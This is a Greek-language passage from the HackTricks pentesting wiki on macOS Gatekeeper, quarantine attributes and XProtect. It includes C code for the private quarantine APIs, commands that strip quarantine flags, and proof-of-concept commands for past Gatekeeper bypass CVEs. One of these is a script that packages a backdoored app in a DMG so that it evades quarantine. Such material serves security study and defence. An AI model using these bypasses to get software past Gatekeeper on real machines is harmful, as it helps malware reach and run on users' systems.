• Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks; ή θέλετε να έχετε πρόσβαση στην τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!

• Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs

• Αποκτήστε το επίσημο PEASS & HackTricks swag

• Εγγραφείτε στη 💬 ομάδα Discord ή στην ομάδα τηλεγραφήματος ή ακολουθήστε με στο Twitter 🐦@carlospolopm.

• Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο αποθετήριο hacktricks και αποθετήριο hacktricks-cloud

```c #include #include

enum qtn_flags { QTN_FLAG_DOWNLOAD = 0x0001, QTN_FLAG_SANDBOX = 0x0002, QTN_FLAG_HARD = 0x0004, QTN_FLAG_USER_APPROVED = 0x0040, };

#define qtn_proc_alloc _qtn_proc_alloc #define qtn_proc_apply_to_self _qtn_proc_apply_to_self #define qtn_proc_free _qtn_proc_free #define qtn_proc_init _qtn_proc_init #define qtn_proc_init_with_self _qtn_proc_init_with_self #define qtn_proc_set_flags _qtn_proc_set_flags #define qtn_file_alloc _qtn_file_alloc #define qtn_file_init_with_path _qtn_file_init_with_path #define qtn_file_free _qtn_file_free #define qtn_file_apply_to_path _qtn_file_apply_to_path #define qtn_file_set_flags _qtn_file_set_flags #define qtn_file_get_flags _qtn_file_get_flags #define qtn_proc_set_identifier _qtn_proc_set_identifier

typedef struct _qtn_proc *qtn_proc_t; typedef struct _qtn_file *qtn_file_t;

int qtn_proc_apply_to_self(qtn_proc_t); void qtn_proc_init(qtn_proc_t); int qtn_proc_init_with_self(qtn_proc_t); int qtn_proc_set_flags(qtn_proc_t, uint32_t flags); qtn_proc_t qtn_proc_alloc(); void qtn_proc_free(qtn_proc_t); qtn_file_t qtn_file_alloc(void); void qtn_file_free(qtn_file_t qf); int qtn_file_set_flags(qtn_file_t qf, uint32_t flags); uint32_t qtn_file_get_flags(qtn_file_t qf); int qtn_file_apply_to_path(qtn_file_t qf, const char *path); int qtn_file_init_with_path(qtn_file_t qf, const char path); int qtn_proc_set_identifier(qtn_proc_t qp, const char bundleid);

int main() {

qtn_proc_t qp = qtn_proc_alloc(); qtn_proc_set_identifier(qp, "xyz.hacktricks.qa"); qtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED); qtn_proc_apply_to_self(qp); qtn_proc_free(qp);

FILE *fp; fp = fopen("thisisquarantined.txt", "w+"); fprintf(fp, "Hello Quarantine\n"); fclose(fp);

return 0;

}

</details>

Και **αφαιρέστε** αυτό το χαρακτηριστικό με:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine

Και βρείτε όλα τα αρχεία σε καραντίνα με:

find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"

Οι πληροφορίες καραντίνας αποθηκεύονται επίσης σε μια κεντρική βάση δεδομένων που διαχειρίζεται από το LaunchServices στο ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2.

Quarantine.kext

Η επέκταση πυρήνα είναι διαθέσιμη μόνο μέσω της προσωρινής μνήμης πυρήνα στο σύστημα. Ωστόσο, μπορείτε να κατεβάσετε το Kernel Debug Kit από τη διεύθυνση https://developer.apple.com/, το οποίο θα περιέχει μια συμβολοποιημένη έκδοση της επέκτασης.

XProtect

Το XProtect είναι μια ενσωματωμένη λειτουργία αντι-κακόβουλου λογισμικού στο macOS. Το XProtect ελέγχει οποιαδήποτε εφαρμογή όταν εκτελείται για πρώτη φορά ή τροποποιείται έναντι της βάσης δεδομένων του γνωστού κακόβουλου λογισμικού και ανθυγιεινών τύπων αρχείων. Όταν κατεβάζετε ένα αρχείο μέσω συγκεκριμένων εφαρμογών, όπως το Safari, το Mail ή το Messages, το XProtect σαρώνει αυτόματα το αρχείο. Αν ταιριάζει με οποιοδήποτε κακόβουλο λογισμικό στη βάση δεδομένων του, το XProtect θα εμποδίσει το αρχείο από την εκτέλεση και θα σας ειδοποιήσει για τον κίνδυνο.

Η βάση δεδομένων του XProtect ενημερώνεται τακτικά από την Apple με νέους ορισμούς κακόβουλου λογισμικού, και αυτές οι ενημερώσεις κατεβάζονται και εγκαθίστανται αυτόματα στο Mac σας. Αυτό εξασφαλίζει ότι το XProtect είναι πάντα ενημερωμένο με τις τελευταίες γνωστές απειλές.

Ωστόσο, αξίζει να σημειωθεί ότι το XProtect δεν είναι μια πλήρως λειτουργική λύση αντιιών. Ελέγχει μόνο για μια συγκεκριμένη λίστα γνωστών απειλών και δεν πραγματοποιεί σάρωση κατά την πρόσβαση όπως η πλειονότητα των λογισμικών αντιιών.

Μπορείτε να λάβετε πληροφορίες σχετικά με την τελευταία ενημέρωση του XProtect εκτελώντας:

system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5

Το XProtect βρίσκεται σε προστατευμένη τοποθεσία SIP στο /Library/Apple/System/Library/CoreServices/XProtect.bundle και μέσα στο bundle μπορείτε να βρείτε πληροφορίες που χρησιμοποιεί το XProtect:

• XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist: Επιτρέπει σε κώδικα με αυτά τα cdhashes να χρησιμοποιούν παλαιές εξουσιοδοτήσεις.

• XProtect.bundle/Contents/Resources/XProtect.meta.plist: Λίστα με πρόσθετα που απαγορεύεται να φορτωθούν μέσω του BundleID και TeamID ή ενδεικτικός ελάχιστος αριθμός έκδοσης.

• XProtect.bundle/Contents/Resources/XProtect.yara: Κανόνες Yara για τον εντοπισμό κακόβουλου λογισμικού.

• XProtect.bundle/Contents/Resources/gk.db: Βάση δεδομένων SQLite3 με hashes αποκλεισμένων εφαρμογών και TeamIDs.

Σημειώστε ότι υπάρχει μια άλλη εφαρμογή στο /Library/Apple/System/Library/CoreServices/XProtect.app που σχετίζεται με το XProtect και δεν συμμετέχει στη διαδικασία του Gatekeeper.

Όχι Gatekeeper

Σημειώστε ότι ο Gatekeeper δεν εκτελείται κάθε φορά που εκτελείτε μια εφαρμογή, μόνο το AppleMobileFileIntegrity (AMFI) θα ελέγχει μόνο τις υπογραφές εκτελέσιμου κώδικα όταν εκτελέσετε μια εφαρμογή που έχει ήδη εκτελεστεί και ελεγχθεί από το Gatekeeper.

Συνεπώς, παλαιότερα ήταν δυνατό να εκτελείτε μια εφαρμογή για να την κρατήσετε στη μνήμη cache με το Gatekeeper, στη συνέχεια να τροποποιήσετε μη εκτελέσιμα αρχεία της εφαρμογής (όπως τα αρχεία Electron asar ή NIB) και αν δεν υπήρχαν άλλες προστασίες, η εφαρμογή εκτελούνταν με τις κακόβουλες προσθήκες.

Ωστόσο, τώρα αυτό δεν είναι δυνατό επειδή το macOS αποτρέπει την τροποποίηση αρχείων μέσα στα bundles εφαρμογών. Έτσι, αν προσπαθήσετε την επίθεση Dirty NIB, θα διαπιστώσετε ότι πλέον δεν είναι δυνατό να την εκμεταλλευτείτε επειδή μετά την εκτέλεση της εφαρμογής για να την κρατήσετε στη μνήμη cache με το Gatekeeper, δεν θα μπορείτε να τροποποιήσετε το bundle. Και αν αλλάξετε για παράδειγμα το όνομα του φακέλου Contents σε NotCon (όπως υποδεικνύεται στην εκμετάλλευση), και στη συνέχεια εκτελέσετε το κύριο δυαδικό αρχείο της εφαρμογής για να την κρατήσετε στη μνήμη cache με το Gatekeeper, θα προκαλέσει ένα σφάλμα και δεν θα εκτελεστεί.

Παρακάμψεις Gatekeeper

Οποιοδήποτε τρόπος παράκαμψης του Gatekeeper (καταφέρνοντας να κάνετε τον χρήστη να κατεβάσει κάτι και να το εκτελέσει όταν ο Gatekeeper θα έπρεπε να το απορρίψει) θεωρείται μια ευπάθεια στο macOS. Αυτά είναι μερικά CVEs που ανατέθηκαν σε τεχνικές που επέτρεπαν την παράκαμψη του Gatekeeper στο παρελθόν:

CVE-2021-1810

Παρατηρήθηκε ότι εάν χρησιμοποιηθεί το Archive Utility για την εξαγωγή, τα αρχεία με μονοπάτια που υπερβαίνουν τους 886 χαρακτήρες δεν λαμβάνουν το επέκτασης com.apple.quarantine. Αυτή η κατάσταση επιτρέπει απρόθεντα σε αυτά τα αρχεία να παρακάμψουν τους ελέγχους ασφαλείας του Gatekeeper.

Ελέγξτε την αρχική αναφορά για περισσότερες πληροφορίες.

CVE-2021-30990

Όταν δημιουργείται μια εφαρμογή με το Automator, οι πληροφορίες σχετικά με το τι χρειάζεται για να εκτελεστεί βρίσκονται μέσα στο application.app/Contents/document.wflow και όχι στο εκτελέσιμο. Το εκτελέσιμο είναι απλά ένα γενικό δυαδικό αρχείο Automator που ονομάζεται Automator Application Stub.

Συνεπώς, θα μπορούσατε να κάνετε το application.app/Contents/MacOS/Automator\ Application\ Stub να δείχνει με ένα συμβολικό σύνδεσμο σε ένα άλλο Automator Application Stub μέσα στο σύστημα και θα εκτελεί αυτό που βρίσκεται μέσα στο document.wflow (το σενάριό σας) χωρίς να ενεργοποιήσει το Gatekeeper επειδή το πραγματικό εκτελέσιμο δεν έχει το quarantine xattr.

Παράδειγμα αναμενόμενης τοποθεσίας: /System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub

Ελέγξτε την αρχική αναφορά για περισσότερες πληροφορίες.

CVE-2022-22616

Σε αυτή την παράκαμψη δημιουργήθηκε ένα αρχείο zip με μια εφαρμογή που ξεκινά τη συμπίεση από το application.app/Contents αντί από το application.app. Έτσι, η προστασία καραντίνας εφαρμόστηκε σε όλα τα αρχεία από το application.app/Contents αλλά όχι στο application.app, το οποίο ελέγχετο από το Gatekeeper, οπότε το Gatekeeper παρακάμφθηκε επειδή όταν ενεργοποιήθηκε το application.app δεν είχε το χαρακτηριστικό καραντίνας.

zip -r test.app/Contents test.zip

Ελέγξτε την αρχική αναφορά για περισσότερες πληροφορίες.

CVE-2022-32910

Ακόμα κι αν τα στοιχεία είναι διαφορετικά, η εκμετάλλευση αυτής της ευπάθειας είναι πολύ παρόμοια με την προηγούμενη. Σε αυτήν την περίπτωση θα δημιουργήσουμε ένα Apple Archive από το application.app/Contents έτσι ώστε το application.app να μην λάβει το χαρακτηριστικό καραντίνας όταν αποσυμπιέζεται από το Archive Utility.

aa archive -d test.app/Contents -o test.app.aar

Ελέγξτε την αρχική έκθεση για περισσότερες πληροφορίες.

CVE-2022-42821

Το ACL writeextattr μπορεί να χρησιμοποιηθεί για να αποτρέψει οποιονδήποτε από το να γράψει ένα χαρακτηριστικό σε ένα αρχείο:

touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'

Επιπλέον, η μορφή αρχείου AppleDouble αντιγράφει ένα αρχείο συμπεριλαμβανομένων των ACEs του.

Στον πηγαίο κώδικα είναι δυνατόν να δούμε ότι η αναπαράσταση κειμένου ACL που αποθηκεύεται μέσα στο xattr με το όνομα com.apple.acl.text θα οριστεί ως ACL στο αποσυμπιεσμένο αρχείο. Έτσι, αν συμπιέσετε μια εφαρμογή σε ένα αρχείο zip με τη μορφή αρχείου AppleDouble με ένα ACL που εμποδίζει άλλα xattrs να γραφτούν σε αυτό... το xattr καραντίνας δεν ορίστηκε στην εφαρμογή:

chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
python3 -m http.server
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr

Ελέγξτε την αρχική αναφορά για περισσότερες πληροφορίες.

Σημειώστε ότι αυτό θα μπορούσε επίσης να εκμεταλλευτείται με το AppleArchives:

mkdir app
touch app/test
chmod +a "everyone deny write,writeattr,writeextattr" app/test
aa archive -d app -o test.aar

CVE-2023-27943

Ανακαλύφθηκε ότι το Google Chrome δεν έθετε το χαρακτηριστικό καραντίνας σε ληφθέντα αρχεία λόγω ορισμένων εσωτερικών προβλημάτων του macOS.

CVE-2023-27951

Τα αρχεία μορφής AppleDouble αποθηκεύουν τα χαρακτηριστικά ενός αρχείου σε ένα ξεχωριστό αρχείο που ξεκινά με ._, κάτι που βοηθά στην αντιγραφή χαρακτηριστικών αρχείων μεταξύ μηχανημάτων macOS. Ωστόσο, παρατηρήθηκε ότι μετά την αποσυμπίεση ενός αρχείου AppleDouble, το αρχείο που ξεκινά με ._ δεν έλαβε το χαρακτηριστικό καραντίνας.

mkdir test
echo a > test/a
echo b > test/b
echo ._a > test/._a
aa archive -d test/ -o test.aar

# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute

Μπορώντας να δημιουργήσετε ένα αρχείο που δεν θα έχει ορισθεί η ιδιότητα καραντίνας, ήταν δυνατό να παρακάμψετε το Gatekeeper. Το κόλπο ήταν να δημιουργήσετε ένα αρχείο εφαρμογής DMG χρησιμοποιώντας το συμβολισμό ονομασίας AppleDouble (ξεκινώντας με ._) και να δημιουργήσετε ένα ορατό αρχείο ως σύμβολο σε αυτό το κρυφό αρχείο χωρίς την ιδιότητα καραντίνας. Όταν το αρχείο dmg εκτελείται, καθώς δεν έχει ιδιότητα καραντίνας, θα παρακάμψει το Gatekeeper.

# Create an app bundle with the backdoor an call it app.app

echo "[+] creating disk image with app"
hdiutil create -srcfolder app.app app.dmg

echo "[+] creating directory and files"
mkdir
mkdir -p s/app
cp app.dmg s/app/._app.dmg
ln -s ._app.dmg s/app/app.dmg

echo "[+] compressing files"
aa archive -d s/ -o app.aar

Αποτροπή Χαρακτηριστικού Καραντίνας xattr

Σε ένα πακέτο ".app", εάν το χαρακτηριστικό καραντίνας xattr δεν προστεθεί σε αυτό, όταν το εκτελέσετε ο Gatekeeper δεν θα ενεργοποιηθεί.